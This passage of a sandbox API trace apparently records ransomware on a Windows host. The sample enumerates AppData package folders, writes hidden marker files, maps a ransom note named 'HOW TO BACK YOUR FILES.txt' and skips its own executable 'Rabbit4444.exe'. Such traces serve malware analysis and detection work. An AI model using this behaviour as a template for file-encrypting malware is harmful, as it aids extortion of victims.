ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf68a8755, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0061.289] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0061.289] lstrcpyW (in: lpString1=0x130ebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.289] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.290] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.290] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.291] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.291] CloseHandle (hObject=0x2a0) returned 1 [0061.291] CloseHandle (hObject=0x27c) returned 1 [0061.291] GetCurrentThreadId () returned 0xd98 [0061.291] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0061.291] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp" [0061.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118f48 | out: hHeap=0xe0000) returned 1 [0061.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0061.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp" [0061.291] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\" [0061.291] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0061.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.292] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.295] FlushFileBuffers (hFile=0x27c) returned 1 [0061.296] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.296] CloseHandle (hObject=0x27c) returned 1 [0061.296] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp") returned 80 [0061.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.296] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2639eab, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddaef41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0061.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.296] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.296] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.297] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.297] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2639eab, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddaef41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.297] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.297] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.297] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.297] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.297] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.297] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddaef41, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddaef41, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddaef41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.297] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.297] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.297] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddaef41, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddaef41, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddaef41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.297] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0061.297] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.297] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.297] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.298] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.298] CloseHandle (hObject=0x2a0) returned 1 [0061.298] CloseHandle (hObject=0x27c) returned 1 [0061.298] GetCurrentThreadId () returned 0xd98 [0061.298] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0061.298] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory" [0061.298] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123e00 | out: hHeap=0xe0000) returned 1 [0061.298] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0061.298] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory" [0061.298] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\" [0061.298] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0061.299] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.300] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.302] FlushFileBuffers (hFile=0x27c) returned 1 [0061.303] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.303] CloseHandle (hObject=0x27c) returned 1 [0061.304] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory") returned 87 [0061.304] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.304] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26392d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.304] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.304] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.304] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.304] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.304] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26392d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.304] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.304] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.304] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.304] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.304] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.304] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddd5217, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddd5217, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.304] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.304] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.304] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddd5217, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddd5217, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.304] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.304] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.304] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.305] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.305] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.305] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.305] CloseHandle (hObject=0x2a0) returned 1 [0061.305] CloseHandle (hObject=0x27c) returned 1 [0061.305] GetCurrentThreadId () returned 0xd98 [0061.305] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0061.305] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies" [0061.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1240e0 | out: hHeap=0xe0000) returned 1 [0061.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0061.305] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies" [0061.305] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\" [0061.305] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0061.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.306] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.309] FlushFileBuffers (hFile=0x27c) returned 1 [0061.310] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.310] CloseHandle (hObject=0x27c) returned 1 [0061.312] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies") returned 87 [0061.312] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.312] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26389a5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0061.312] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.312] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.312] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.312] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.312] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26389a5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.312] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.313] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.313] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.313] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.313] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.313] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddd5217, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddd5217, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.313] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.313] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.313] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddd5217, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddd5217, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddd5217, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.313] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0061.313] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.313] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.313] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.313] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.314] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.314] CloseHandle (hObject=0x2a0) returned 1 [0061.314] CloseHandle (hObject=0x27c) returned 1 [0061.314] GetCurrentThreadId () returned 0xd98 [0061.314] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0061.314] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe") 